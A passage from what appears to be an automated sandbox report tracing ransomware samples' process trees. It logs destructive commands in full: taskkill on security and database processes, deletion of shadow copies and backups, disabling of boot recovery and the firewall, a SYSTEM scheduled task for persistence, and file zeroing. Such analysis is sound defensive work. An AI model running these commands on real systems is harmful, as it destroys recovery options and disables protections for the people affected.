                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:11104
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM isqlplussvc.exe /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:7988
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM tmlisten.exe /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5036
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM onenote.exe /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:12284
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                3⤵
                                                                                                  PID:5424
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                "taskkill.exe" /IM ocomm.exe /F
                                                                                                2⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:9632
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                2⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:11192
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                "taskkill.exe" /IM CNTAoSMgr.exe /F
                                                                                                2⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:9280
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  3⤵
                                                                                                    PID:5792
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  "taskkill.exe" /IM dbsnmp.exe /F
                                                                                                  2⤵
                                                                                                  • Kills process with taskkill
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:12508
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  "taskkill.exe" /IM agntsvc.exe /F
                                                                                                  2⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:8740
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  "taskkill.exe" /IM msftesql.exe /F
                                                                                                  2⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:7484
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                  2⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:13372
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  "taskkill.exe" /IM xfssvccon.exe /F
                                                                                                  2⤵
                                                                                                    PID:13664
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    "taskkill.exe" /IM sqlwriter.exe /F
                                                                                                    2⤵
                                                                                                      PID:9724
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      "taskkill.exe" /IM infopath.exe /F
                                                                                                      2⤵
                                                                                                        PID:7672
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                        2⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:10108
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        "taskkill.exe" /IM mysqld.exe /F
                                                                                                        2⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:10600
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        "taskkill.exe" /IM winword.exe /F
                                                                                                        2⤵
                                                                                                          PID:1648
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            3⤵
                                                                                                              PID:2360
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            "taskkill.exe" /IM mspub.exe /F
                                                                                                            2⤵
                                                                                                              PID:8548
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                3⤵
                                                                                                                  PID:8520
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                "taskkill.exe" /IM mbamtray.exe /F
                                                                                                                2⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:2760
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                "taskkill.exe" /IM tbirdconfig.exe /F
                                                                                                                2⤵
                                                                                                                  PID:9308
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  "taskkill.exe" /IM powerpnt.exe /F
                                                                                                                  2⤵
                                                                                                                    PID:8756
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    "taskkill.exe" /IM thebat.exe /F
                                                                                                                    2⤵
                                                                                                                      PID:7308
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      "taskkill.exe" /IM PccNTMon.exe /F
                                                                                                                      2⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:9028
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      "taskkill.exe" /IM zoolz.exe /F
                                                                                                                      2⤵
                                                                                                                        PID:7748
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        "taskkill.exe" /IM dbeng50.exe /F
                                                                                                                        2⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:12680
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        "taskkill.exe" /IM sqbcoreservice.exe /F
                                                                                                                        2⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:12624
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        "taskkill.exe" /IM Ntrtscan.exe /F
                                                                                                                        2⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:12032
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        "taskkill.exe" /IM mysqld-nt.exe /F
                                                                                                                        2⤵
                                                                                                                          PID:9848
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                          2⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:12016
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          "taskkill.exe" /IM steam.exe /F
                                                                                                                          2⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:11712
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          "taskkill.exe" /IM msaccess.exe /F
                                                                                                                          2⤵
                                                                                                                            PID:13444
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            "taskkill.exe" /IM wordpad.exe /F
                                                                                                                            2⤵
                                                                                                                              PID:13900
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:5984
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                "taskkill.exe" /IM ocautoupds.exe /F
                                                                                                                                2⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:13952
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                "taskkill.exe" /IM visio.exe /F
                                                                                                                                2⤵
                                                                                                                                  PID:13956
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  "taskkill.exe" /IM sqlservr.exe /F
                                                                                                                                  2⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:13988
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  "taskkill.exe" /IM outlook.exe /F
                                                                                                                                  2⤵
                                                                                                                                    PID:10416
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    "taskkill.exe" /IM encsvc.exe /F
                                                                                                                                    2⤵
                                                                                                                                      PID:14124
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      "taskkill.exe" /IM mysqld-opt.exe /F
                                                                                                                                      2⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:8248
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      "taskkill.exe" /IM ocssd.exe /F
                                                                                                                                      2⤵
                                                                                                                                        PID:8888
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        "taskkill.exe" /IM synctime.exe /F
                                                                                                                                        2⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:11952
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        "taskkill.exe" /IM oracle.exe /F
                                                                                                                                        2⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:3224
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        "taskkill.exe" /IM sqlagent.exe /F
                                                                                                                                        2⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:13340
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        "taskkill.exe" /IM sqlbrowser.exe /F
                                                                                                                                        2⤵
                                                                                                                                          PID:12472
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                                                                                                                          2⤵
                                                                                                                                            PID:9696
                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                            "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                                                                                                                                            2⤵
                                                                                                                                              PID:13140
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                              2⤵
                                                                                                                                                PID:4316
                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                  ping 127.0.0.7 -n 3
                                                                                                                                                  3⤵
                                                                                                                                                  • Runs ping.exe
                                                                                                                                                  PID:11884
                                                                                                                                                • C:\Windows\SysWOW64\fsutil.exe
                                                                                                                                                  fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                  3⤵
                                                                                                                                                    PID:9472
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:13728
                                                                                                                                                    • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                      choice /C Y /N /D Y /T 3
                                                                                                                                                      3⤵
                                                                                                                                                        PID:13908
                                                                                                                                                  • C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\1fb613ee3b0e7f96f5dea029aae31b86340b0724e88f84a76b386af84d1cf95c.exe
                                                                                                                                                    "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\1fb613ee3b0e7f96f5dea029aae31b86340b0724e88f84a76b386af84d1cf95c.exe"
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Drops desktop.ini file(s)
                                                                                                                                                    PID:4468
                                                                                                                                                  • C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\84ee7e5c055fd25204ca4969940292b03da9d45b5048cbb7f7ba8528b88a2859.exe
                                                                                                                                                    "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\84ee7e5c055fd25204ca4969940292b03da9d45b5048cbb7f7ba8528b88a2859.exe"
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Drops startup file
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    • Drops desktop.ini file(s)
                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    • Modifies Control Panel
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    • Suspicious behavior: RenamesItself
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    • System policy modification
                                                                                                                                                    PID:1344
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1388
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                          3⤵
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:8112
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4c0pciku\4c0pciku.cmdline"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:12616
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB145.tmp" "c:\ProgramData\CSCAA6B3847E25B4ED79CC87615F8C8FC22.TMP"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:8284
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                            2⤵
                                                                                                                                                              PID:9688
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4188
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:7196
                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                    wmic shadowcopy delete
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:10920
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:8968
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:7868
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:8140
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:11104
                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                              netsh advfirewall set currentprofile state off
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                              PID:9628
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:684
                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                netsh firewall set opmode mode=disable
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                PID:8728
                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4288
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1368
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  PID:1396
                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3112
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 1372
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:4848
                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:6416
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6416 -s 356
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:5192
                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:14060
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 14060 -s 1372
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:6200
                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:8012
                                                                                                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:5796
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3260 -ip 3260
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4120
                                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:6744
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4344 -ip 4344
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:6996
                                                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:1416
                                                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:12404
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10596 -ip 10596
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:6788
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6416 -ip 6416
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:9372
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4288 -ip 4288
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:14224
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3112 -ip 3112
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:6772
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 14060 -ip 14060
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:7148
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 8012 -ip 8012
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:6952
                                                                                                                                                                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\Restore-My-Files.txt
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:7908
                                                                                                                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                              werfault.exe /h /shared Global\7b6f44331eed437990146a9da574a361 /t 9660 /p 12440
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:7292
                                                                                                                                                                                                              • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                werfault.exe /h /shared Global\56816419fda347be9092f444afd926c2 /t 10700 /p 12476
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:6904
                                                                                                                                                                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                  C:\Windows\system32\AUDIODG.EXE 0x494 0x4a8
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:10196
                                                                                                                                                                                                                  • C:\Windows\System32\msdt.exe
                                                                                                                                                                                                                    "C:\Windows\System32\msdt.exe" -skip TRUE -id NetworkDiagnosticsNetworkAdapter -ep NetworkDiagnosticsPNI
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2412
                                                                                                                                                                                                                    • C:\Windows\System32\sdiagnhost.exe
                                                                                                                                                                                                                      C:\Windows\System32\sdiagnhost.exe -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:8156
                                                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                          "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter AdapterGuid={AB2418AB-8E27-47CB-B73C-A84AC6D163ED}
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:10788
                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                            "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter AdapterGuid={AB2418AB-8E27-47CB-B73C-A84AC6D163ED}
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:11996
                                                                                                                                                                                                                            • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                              "C:\Windows\system32\ipconfig.exe" /all
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Gathers network information
                                                                                                                                                                                                                              PID:12148
                                                                                                                                                                                                                            • C:\Windows\system32\ROUTE.EXE
                                                                                                                                                                                                                              "C:\Windows\system32\ROUTE.EXE" print
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:12016
                                                                                                                                                                                                                              • C:\Windows\system32\makecab.exe
                                                                                                                                                                                                                                "C:\Windows\system32\makecab.exe" /f NetworkConfiguration.ddf
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:13916
                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                PID:10188
                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:8360
                                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:9056
                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:6308
                                                                                                                                                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                      werfault.exe /h /shared Global\f62fc979f20042c5beb5e22319cbcec5 /t 9724 /p 2412
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:12368
                                                                                                                                                                                                                                      • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                        "C:\Windows\system32\NOTEPAD.EXE" F:\RESTORE_FILES_INFO.txt
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:12020
                                                                                                                                                                                                                                        • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\RESTORE_FILES_INFO.txt
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Opens file in notepad (likely ransom note)
                                                                                                                                                                                                                                          PID:5808
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultb701ded8hdcafh4bf1h83e7h0a298a9afe87
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:10988
                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa838b46f8,0x7ffa838b4708,0x7ffa838b4718
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:13088
                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:8464
                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
